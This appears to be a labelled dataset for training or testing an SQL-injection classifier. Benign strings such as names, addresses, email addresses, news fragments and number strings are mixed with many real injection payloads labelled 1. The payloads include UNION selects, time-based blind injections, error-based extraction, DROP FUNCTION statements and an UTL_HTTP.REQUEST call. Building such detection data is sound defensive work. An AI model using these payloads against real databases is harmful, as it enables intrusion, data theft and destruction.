-1940 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric )	1
dotan	0
Rockstar seeking increased damages Google , claims Google &apos;s patent infringement willful , according complaint	0
select ( case when ( 1434 = 1549 ) then 1434 else 1434* ( select 1434 from mysql.db ) end ) #	1
3675111830638462	0
meier	0
' IN BOOLEAN MODE);IF(6823=7419) SELECT 6823 ELSE DROP FUNCTION OLWd--	1
2784102428679593	0
10110	0
1%' ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --	1
Email: -4226')) OR 2860=2860 AND (('igsG' LIKE 'igsG	1
))) AND 6758=6758-- jUft	1
cruselles varela	0
))) AND 1769=4322-- dLdW	1
&quot; He &apos;t give , &quot; Ms Corteen said	0
silvino	0
72ic5oid4	0
")/**/As/**/rUQJ/**/wheRE/**/6498=6498/**/rlIke/**/(SELEct/**/4301/**/FrOm/**/(SELEct(SlEeP(5)))URhz)--/**/vqHe	1
camino de leganes, 13	0
hanzlice	0
')/**/As/**/paHG/**/whEre/**/8992=8992/**/rlIKe/**/(SElecT/**/(CAsE/**/When/**/(4726=8832)/**/tHen/**/0x656d616e75656c40676d61696c2e636f6d/**/ElsE/**/0x28/**/eNd))--/**/eZXY	1
' HAVING 6828=6828-- wEIV	1
castrono	0
adversario	0
pasaje cox 194, 5?f	0
1" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( "hmun" = "hmun	1
1'+ ( select tzvm where 5145 = 5145 and 4192 = 7437#	1
-7795" ) where 1712 = 1712 union all select 1712,1712,1712,1712#	1
calle doctor bove, 65	0
homero	0
elwira	0
9302806159554229	0
select * from users where id = 1 or " ) 1" or 1 = 1 -- 1	1
1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'vfnl' = 'vfnl	1
'/**/WHerE/**/7793=7793/**/aND/**/7048=(sELect/**/7048/**/fROM/**/Pg_SLeeP(5))--	1
81568460h	0
wailing@mariposasentudia.je	0
select * from users where id = 1 or \<\ union select 1,@@VERSION -- 1	1
garfiada	0
Terminal 3 serves mainly small US airlines	0
car	0
1' ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( 'mizk' = 'mizk	1
oroz-betelu	0
hanlon@importaproductosespaoles.cs	0
Mayor Erich Maier responded postal service communicated Lampertheim	0
07529	0
She appointed outside monitor oversee major changes , including reforms policies , training supervision , ordered pilot program test body-worn cameras precincts stops occur	0
allegra	0
torrecilla lafuente	0
1' ) union all select null,null,null,null--	1
1' ) where 7646 = 7646 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --	1
select ( case when ( 1275 = 7674 ) then 1275 else 1275* ( select 1275 from information_schema.character_sets ) end ) #	1
;SELECT CASE WHEN 9495=2393 THEN 1 ELSE NULL END--	1
reele.cto	0
President , I &apos;t agree	0
1%" ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( "%" = "	1
"/**/Or/**/noT/**/4928=4928/**/aND/**/"prbu"="prbu	1
1'+ ( select 'leok' where 4320 = 4320	1
lemunao porxas	0
1" ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( "eeye" = "eeye	1
'/**/And/**/sLeEP(5)--/**/egxr	1
) AND 9690 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9690=9690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)))-- rPqQ	1
"/**/anD/**/8342/**/iN/**/(sElEct/**/(cHAR(113)+cHAR(98)+cHAR(106)+cHAR(120)+cHAR(113)+(sElEct/**/(cASE/**/WheN/**/(8342=8342)/**/THen/**/cHAR(49)/**/ELse/**/cHAR(48)/**/eND))+cHAR(113)+cHAR(122)+cHAR(113)+cHAR(113)+cHAR(113)))/**/anD/**/"eKzN"="eKzN	1
girish	0
9usta4ui6	0
1 where 7442 = 7442	1
/**/AnD/**/8137=(SELeCT/**/8137/**/FRom/**/PG_sLeEP(5))	1
/**/oR/**/NoT/**/4928=4928--/**/WiwJ	1
01084400l	0
1 where 6500 = 6500	1
urbanizacion girasoles poblachuela, 155, 11?g	0
select case when 3920 = 4402 then 1 else null end--	1
The California woman plans challenge may first-of-its-kind citation , saying Internet-connected eyewear makes navigation easier	0
3609841962548925	0
ponts	0
vinaixa calleiros	0
' and 1 = 0 ) union all	1
1%' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( '%' = '	1
86064216x	0
1%' ) ) union all select null,null,null,null,null#	1
select * from users where id = 1 or 1#"@ union select version ( ) ,version ( ) -- 1	1
jackley@engibraltar.com.nu	0
select * from users where id = 1 or "_{" or 1 = 1 -- 1	1
+(SeLECT/**/ldIY/**/WhEre/**/4101=4101/**/Or/**/SlEEp(5))+	1
select * from users where id = 1 or "\#" or 1 = 1 -- 1	1
paladio	0
velilla de san antonio	0
On Saturday 7 September , Highland Games start 1: 30 p	0
1" ) where 1700 = 1700 union all select null,null,null,null,null#	1
fabien	0
almoharn	0
declare @s varchar ( 200 ) select @s = 0x77616974 ...	1
-8612" ) or 4043 = 3083 and ( "pjzo" like "pjzo	1
1' ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --	1
`)/**/WhERE/**/1156=1156;(SELect/**/*/**/froM/**/(SELect(SLeEP(5)))gTnS)#	1
0518984611180264	0
Email: -2548)/**/oR/**/1722=1183	1
cencier	0
mcgowan	0
1' ) where 2284 = 2284 and make_set ( 8403 = 8403,8899 ) --	1
tolomei vil	0
'));iF(6258=7765)/**/seLeCT/**/6258/**/elSe/**/DRoP/**/FuNcTiON/**/WriG--	1
1 ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #	1
Some commentators interpreted use force attempt ailing movement win concessions financial spoils government	0
steelsmith@7peines.com	0
Email: -3003'))/**/aS/**/hNcf/**/wHErE/**/6680=6680/**/orDEr/**/By/**/1--/**/MnzJ	1
josep pallch i carola, 199, 4-e	0
sevilla	0
However , anyone takes closer look parking level D2 discover archaeological site , cordoned metal railings	0
")));IF(2192=7650) SELECT 2192 ELSE DROP FUNCTION uNaq--	1
1'|| ( select 'ozoj' where 1608 = 1608	1
&quot; A tape voicemails taken phone least three occasions seized Mulcaire &apos;s home August 2006	0
"/**/orDer/**/By/**/1--/**/LbwK	1
1%' or elt ( 6272 = 6272,sleep ( 5 ) ) and '%' = '	1
14230	0
1' ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'ymad' like 'ymad	1
2528	0
glorieta musico emilio alvarez anton 153,	0
calle caballeros, 160, 3-b	0
He said &quot; serious problems &quot; recruitment , screening , induction , training supervision staff	0
');IF(7613=7613) SELECT 7613 ELSE DROP FUNCTION ohoi--	1
-6039%' ) ) or 6872 = 6872 and ( ( '%' = '	1
grimm@madrid2012.nu	0
'/**/Or/**/slEeP(5)--/**/PITy	1
`) WHERE 8506=8506 AND 9470=9470	1
||UTL_HTTP.REQUEST	1
03450	0
m9ncilla57	0
delmo	0
)/**/RLIkE/**/sleeP(5)/**/anD/**/(8181=8181	1
roussel@santacruzdelvoto.ws	0
9771406974624162	0
1' ) and make_set ( 8403 = 8403,8899 ) and ( 'kyxl' = 'kyxl	1
nazarena	0
1%' ) and 8734 = 5844	1
"));deClARE/**/@x/**/cHaR(9);Set/**/@x=0x303a303a35;WAITFOR/**/DELAY/**/@x/**/And/**/(("Ixjb"="Ixjb	1
77077342h	0
c/ galicia 50 5e	0
')))/**/oR/**/nOt/**/8454=2135/**/aNd/**/((('PKEY'/**/lIke/**/'PKEY	1
The announcement came fighting raged Thursday town Safira , experts say home chemical weapons production facility well storage sites , reported Britain-based Syrian Observatory Human Rights	0
serville9	0
")/**/wHERe/**/3264=3264/**/rliKe/**/sLeEP(5)#	1
16574331w	0
2190197985147035	0
riggsbee	0
1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'novq' = 'novq	1
d9a32ado	0
1'+ ( select 'wkcq' where 1020 = 1020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #	1
vairavan	0
Email: -5974")))/**/oR/**/9153=7662#	1
32252	0
fish@erasmusrooms.de	0
1" ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( "imlx" = "imlx	1
1 ) as fgqe where 1526 = 1526 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --	1
-4236' ) union all select 2076,2076,2076,2076,2076,2076,2076,2076,2076,2076#	1
3742884361976074	0
chen-che	0
balsame@provider.com.mg	0
buch als	0
");DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x--	1
hiscoe	0
7492	0
%' OR NOT 4136=5126 AND 'eeBH%'='eeBH	1
1' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and 'fsvr' = 'fsvr	1
1 ) as iupg where 2861 = 2861 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --	1
sescun3ia	0
gemelli@hiperxxx.asia	0
'))/**/As/**/nKtQ/**/wHeRE/**/7412=7412;sELEcT/**/(CAsE/**/When/**/(7396=1961)/**/tHeN/**/7396/**/ElSE/**/7396*(sELEcT/**/7396/**/fRom/**/INFORMATION_SCHEMA.pluGIns)/**/enD)#	1
paseo canteras 75	0
Email: -4199/**/orDEr/**/bY/**/1#	1
vacas de san juan 153	0
or 0 = 0 --	1
The extent German commercial properties sought evident transaction volumes , said Ulbrich	0
There monitored extent , order control income	0
He telling , &apos;s , sometimes &apos;ll walk alley two buildings think , Hey , I lose money , maybe I &apos;ll live	0
select ( case when ( 6804 = 7050 ) then 6804 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--	1
godish	0
ajorca	0
dacio	0
1" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( "mjkl" = "mjkl	1
16601924h	0
calle matias ramon martinez martinez 30	0
25330	0
keng@glutenfreespain.lb	0
Leg almost hacked off: Rocker retrial A bloody attack within &apos; Rocker &apos; scene re-investigated four years	0
')) AND 9883=2729	1
1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'rtbm' = 'rtbm	1
Email: -5340'))/**/As/**/MHwh/**/wHeRE/**/9022=9022/**/oR/**/2535=2535#	1
wenner@rpdkorea.nr	0
-7007 ) union all select 6704,6704--	1
parola@zonamodelos.pl	0
1' in boolean mode ) waitfor delay '0:0:5'#	1
24324	0
1664	0
5223158056651718	0
cgi down_file http://coolseo	0
" ) ) or sleep ( __TIME__ ) = "	1
'))/**/oR/**/SLEeP(5)/**/aND/**/(('auIZ'='auIZ	1
1' in boolean mode ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) #	1
`)/**/wHeRe/**/9815=9815;SELeCt/**/(caSe/**/WHen/**/(8950=2232)/**/ThEn/**/8950/**/ElSe/**/8950*(SELeCt/**/8950/**/FroM/**/INFORMATION_SCHEMA.pluGInS)/**/eNd)#	1
calle paz, s/n	0
-3063%" ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( "%" = "	1
7x	0
44143	0
florian@alcantarapartners.so	0
The US warns companies economic espionage countries	0
-1796' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'lpuw' like 'lpuw	1
4358738088308536	0
boynton4	0
chilln	0
Journalist Ron Ben-Yishai , writing daily newspaper Yedioth Ahronoth , emphasised Syrian regime already previously attempted , cases successfully , deliver ground air missiles Hezbollah	0
Email: -1394) ORDER BY 9445-- rXMY	1
') AS VxTA WHERE 3881=3881 AND SLEEP(5)#	1
c/ duquesa de castrejon s/n 12g	0
79506626l	0
"));DeclARE/**/@x/**/cHaR(9);Set/**/@x=0x303a303a35;WAITFOR/**/DELAY/**/@x/**/AnD/**/(("bFHy"/**/LiKe/**/"bFHy	1
mcmurray	0
The &quot; rectification &quot; order came Guangdong Administration Press Publication , Radio , Film Television	0
mud6787t6	0
1', ( select 9100 = ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq' ) )	1
99631010r	0
Email: -7090"/**/oRDEr/**/By/**/7744--/**/Ipez	1
&quot; After , I one insulted , &quot; emphasised 46-year-old	0
46960	0
mortandad	0
My book smell pines resound hum insects	0
scot	0
agobiar	0
1'+ ( select immd where 7499 = 7499 union all select null,null,null,null,null,null,null,null#	1
)))/**/ANd/**/6017=(SeLECT/**/cOuNt(*)/**/FRoM/**/SYSMASTER:SYSPAGHDR)/**/ANd/**/(((2517=2517	1
')/**/aS/**/zEZG/**/WHerE/**/2279=2279/**/anD/**/3116=(SElEct/**/3116/**/FrOm/**/Pg_SleEp(5))--/**/ycRZ	1
select * from users where id = '1' union select 1"!",banner from v$version where rownum = 1 -- 1'	1
1'|| ( select 'ubza' where 2576 = 2576	1
or 1 = 1/*	1
hi9dra	0
22880	0
select * from users where id = 1 or "@?" or 1 = 1 -- 1	1
Pamela Anderson chops iconic blonde locks , debuts dramatic new pixie cut	0
antulio	0
1'+ ( select inyd where 1668 = 1668 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) ) +'	1
1" ) ) and 8329 = 5584#	1
swinkels	0
'+(SELECT yRNK WHERE 7746=7746 OR 8824=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)--	1
select ( case when ( 5163 = 4861 ) then 1 else 5163* ( select 5163 from master..sysdatabases ) end ) --	1
usma launes	0
1' ) ) as vwua where 8099 = 8099 union all select null--	1
1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'rhzy' = 'rhzy	1
&quot; The news came day Credit Suisse announced dismissed trader London exchange traded funds desk week caused nearly $ 6m loss late last year	0
select * from generate_series ( 9863,9863,case when ( 9863 = 3285 ) then 1 else 0 end ) limit 1--	1
1%" ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( "%" = "	1
5211	0
passeig nord 23 8b	0
1" ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( "dwpa" = "dwpa	1
1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) # dwxl	1
pfeilsch	0
tilden.auerbach4@cochesautomaticos.ru	0
2875083717333458	0
)));SELECT SLEEP(5)#	1
;SELECT PG_SLEEP(5)--	1
calle panaderas de san cecilio 168	0
In opinion , district &apos;s advantage location advantageous location south-west Germany , immediate proximity France Switzerland	0
9 billion candy , costumes decorations , according National Retail Federation	0
According councillors , reconstruction railway line rejected majority , town Schiltach would &quot; bear brunt cost &quot; problem vehicles becoming stuck , since Deutsche Bahn would able deny responsibility following completion construction work	0
soules	0
santa cruz de tenerife	0
' ORDER BY 7940#	1
carretera aeropuerto, 42,	0
)/**/As/**/oJyz/**/wheRe/**/5228=5228/**/ANd/**/6017=(SelECT/**/cOUNt(*)/**/fROm/**/SYSMAsTER:SYSPAGHDR)--/**/wIyi	1
-4811%' ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( '%' = '	1
!and5ajoso	0
-3497' order by 1#	1
1" waitfor delay '0:0:5'--	1
He accompanied visit Russia two German journalists	0
1pa5364e3a	0
22367	0
';DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x OR 'YFjC'='MsTc	1
&quot; Our current policy electronic devices cannot used take-off landing immediate plans change , &quot; said	0
"/**/aND/**/Sleep(5)#	1
'))/**/aS/**/qOri/**/wHere/**/3134=3134/**/Or/**/slEeP(5)#	1
84950037c	0
bu7c2pi	0
select * from generate_series ( 7610,7610,case when ( 7610 = 9416 ) then 1 else 0 end ) limit 1--	1
1'|| ( select 'mzsy' where 4940 = 4940 or elt ( 5873 = 5873,sleep ( 5 ) ) #	1
paraje contador 158, 12d	0
1%" ) union all select null--	1
The opinions expressed commentary solely Nathaniel Morris	0
Wallis Simpson may intersex	0
-3956' ) or ( 8459 = 8459 ) *4906 and ( 'rflo' like 'rflo	1
-1272' or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #	1
pl. poeta badenes, 48, 11-c	0
-7329" ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( "borw" like "borw	1
&quot; However , speaking truth crime	0
))) OR 8824=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)--	1
ralf	0
`)/**/whErE/**/4986=4986;SELECt/**/(CASe/**/wheN/**/(8658=7489)/**/THeN/**/8658/**/ELse/**/1/(SELECt/**/0)/**/EnD)--	1
select * from users where id = 1 or "{{" or 1 = 1 -- 1	1
janisch4@ebaz.museum	0
de jongh algarra	0
1 ) ) as iihk where 5414 = 5414 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --	1
rinconada valentin gonzalez 70	0
1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )	1
He jailed minimum six years	0
priaranza del bierzo	0
edilio	0
1 union all select null,null,null--	1
1 ) as biup where 1414 = 1414 union all select null,null,null,null,null,null,null,null#	1
nga	0
2138	0
ronda sant antoni maria claret 144,	0
select * from users where id = 1 + ( \. ) or 1 = 1 -- 1	1
-3966' ) or 7338 = 8657	1
estalell	0
( updatexml ( 8862,concat ( 0x2e,0x7171706a71, ( select ( elt ( 8862 = 8862,1 ) ) ) ,0x717a767a71 ) ,8981 ) )	1
alden@b-sign.sv	0
1erso	0
This mail server sends content provider Benni uses	0
Password: -7109")) AS oIak WHERE 2003=2003 OR 6103=1841#	1
;SelEcT/**/(caSE/**/WhEn/**/(8376=2435)/**/tHEN/**/8376/**/eLse/**/1/(SelEcT/**/0)/**/End)--	1
x' or full_name like '%bob%	1
1 ) ) union all select null,null,null,null,null,null,null,null#	1
&quot; Possibly , &quot; Martin replied	0
baltasar	0
))/**/aS/**/cICv/**/WHeRE/**/1959=1959/**/RLIKe/**/(sELEcT/**/(CaSE/**/whEN/**/(1665=5197)/**/Then/**/0x7061737373/**/Else/**/0x28/**/eND))--/**/KSFA	1
1" where 2547 = 2547 or sleep ( 5 ) #	1
-1621' in boolean mode ) order by 1--	1
1 where 2914 = 2914 union all select null,null,null#	1
1" where 3318 = 3318	1
cuboides	0
select * from users where id = 1<@<@ union select 1,version ( ) -- 1	1
alegra	0
')))/**/Or/**/nOt/**/6397=4393--/**/puWN	1
Obviously , elective office &apos;t predictable course , opposing political party random events , Newtown massacre , shape public conversation	0
nicholls@devuelos.vu	0
jengibre	0
lithgow_porte@a2hotels.st	0
-4896' ) union all select 1929--	1
30218134k	0
63ep6240e50o	0
soez	0
lug5r	0
call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( "pdqm" like "pdqm	1
select ( case when ( 8208 = 7960 ) then 8208 else 8208* ( select 8208 from information_schema.character_sets ) end ) #	1
1%" ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( "%" = "	1
Physical changes &apos;t mean puberty imminent There &apos;s evidence hormones chemicals blame Experts think obesity epidemic might one trigger early puberty The trend toward early puberty pronounced boys Former CNN correspondent Pat Etheridge journalist specializing children &apos;s health family issues	0
-3540 where 7302 = 7302 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --	1
-7083 union all select 7705,7705,7705,7705,7705#	1
But keep head shoulder? Why drag corpse memory, lest contradict somewhat stated public place? Suppose contradict yourself; then? It seems rule wisdom never rely memory alone, scarcely even acts pure memory, bring past judgment thousand-eyed present, live ever new day	0
yanil	0
1" where 9669 = 9669	1
Email: -8560'))/**/Or/**/4805=4805/**/And/**/(('mWiN'/**/LiKE/**/'mWiN	1
pasaje america 189 4?a	0
cami sant cugat al papiol 59,	0
Email: -1728' OR 8190=9873	1
c/ san pablo 130, 8h	0
cao	0
1" ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --	1
2252	0
medici-bousen@youtubeanunciox.mm	0
1 ) ) as hgtl where 3864 = 3864 and elt ( 3114 = 3114,sleep ( 5 ) ) #	1
1'+ ( select 'hrxp' where 5948 = 5948	1
';If(2590=8539)/**/SelecT/**/2590/**/Else/**/DrOp/**/FunCTiOn/**/Oybx--	1
1' ) as ekjw where 5477 = 5477 union all select null,null,null,null,null--	1
l1b6855ca30e	0
1 ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno )	1
moldero	0
After several years debate , Town Council finally approved project , cost 5 million krone (around EUR 615,000)	0
1" ) ) as sdlv where 5922 = 5922 and 2006 = 2006	1
1'+ ( select pdfv where 1172 = 1172 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) ) +'	1
63a5et5192	0
dalenna	0
"))/**/aS/**/iKnL/**/wHerE/**/9099=9099;SeleCT/**/pG_SLEEP(5)--/**/dhtx	1
08298	0
torrent refojo	0
avda. manuel gorria, 97, 7?f	0
Rescue workers retrieve charred body house	0
39669776c	0
select * from users where id = 1 or 1#" ( union select null,version ( ) -- 1	1
Infancy conforms nobody: conform it, one babe commonly makes four five adults prattle play it	0
-7379 union all select 9813,9813,9813,9813,9813,9813,9813,9813--	1
lan	0
shade@bwds.name	0
1%" ) ) ) union all select null,null,null,null,null,null#	1
de_la	0
Immediately local district derby FC Schalke 04 , travelling BVB fans fired flares crowds spectators onto pitch - almost hit goalkeeper Roman Weidenfeller	0
callejon pavaneras, 69 6?b	0
8449	0
-6014" or make_set ( 3003 = 2609,2609 )	1
08109487d	0
dunik	0
1%' ) or elt ( 5873 = 5873,sleep ( 5 ) ) #	1
93026638x	0
micr6pil8	0
1' ) ) as txxn where 7884 = 7884 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --	1
calle juan sitges 24,	0
calle joan salvat papasseit s/n,	0
)) AS inQJ WHERE 2861=2861 RLIKE (SELECT (CASE WHEN (5043=3512) THEN 0x656d616e75656c40676d61696c2e636f6d ELSE 0x28 END))-- XKpW	1
620	0
When rebels , experiences extreme cruelty hands wantonly sadistic Mother Superior becomes object erotic fascination another	0
1" ) as drrx where 8633 = 8633 union all select null,null,null--	1
According proposal , parking fees increased 50 per cent	0
And Congress &apos;t agree whether proceed , several states waiting	0
))/**/As/**/fYZp/**/whERE/**/3924=3924;(SeLeCT/**/*/**/FroM/**/(SeLeCT(SLeeP(5)))qUCI)--/**/dAqS	1
jenner	0
1%' ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( '%' = '	1
'/**/Or/**/4429=(SElecT/**/4429/**/FRom/**/Pg_SLeEp(5))--	1
des-enartar	0
1" ) union all select null,null,null,null--	1
75817612k	0
select * from users where id = 1 % ( @ ) or 1 = 1 -- 1	1
1' ) and 1987 = 3756#	1
The speaker Johanna Rahner	0
-7499%" ) union all select 1893,1893,1893,1893,1893#	1
1 ) ) ) union all select null,null,null--	1
) AS YhHl WHERE 9372=9372;SELECT PG_SLEEP(5)--	1
select * from information_schema.tables--	1
') AS jENR WHERE 6207=6207;SELECT PG_SLEEP(5)-- lCsO	1
Report: Obama campaign considered dumping Biden Hillary Clinton President Barack Obama &apos;s closest advisers secretly considered replacing Vice President Joe Biden Hillary Clinton 2012 ticket , according New York Times	0
') AND 9092=8984#	1
))/**/Or/**/sleEP(5)/**/aNd/**/((3370=3370	1
48825670m	0
select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( "pxbk" like "pxbk	1
3278824156845897	0
'/**/wheRe/**/3217=3217/**/Or/**/3757=(seLecT/**/3757/**/FroM/**/pg_sLEep(5))--/**/SAvR	1
m	0
')) AND 9690 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9690=9690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113))) AND (('gNUg' LIKE 'gNUg	1
)) AS OHEc WHERE 8461=8461;IF(7613=7613) SELECT 7613 ELSE DROP FUNCTION ohoi--	1
15819331t	0
10421521z	0
1' ) where 1804 = 1804 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #	1
gayle@freetag.name	0
sant andreu de la barca	0
'));WAITFOR/**/DELAY/**/'0:0:5'/**/ANd/**/(('ZGtz'/**/LIke/**/'ZGtz	1
1 ) where 5073 = 5073 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --	1
37428	0
pozzetto@miplat.am	0
")) AS RGva WHERE 2494=2494;SELECT PG_SLEEP(5)-- emtC	1
legarreta sant	0
9548	0
))/**/aNd/**/8986=(selEcT/**/(caSe/**/wHEn/**/(8986=8986)/**/Then/**/8986/**/ELsE/**/(selEcT/**/5641/**/UniOn/**/selEcT/**/8207)/**/eND))--/**/eXVy	1
1' ) where 9516 = 9516	1
30097796l	0
severiano	0
')/**/As/**/hvBJ/**/wHeRe/**/4102=4102/**/anD/**/7335=7335	1
09620	0
c/ ca n'alzina, 80, 6-b	0
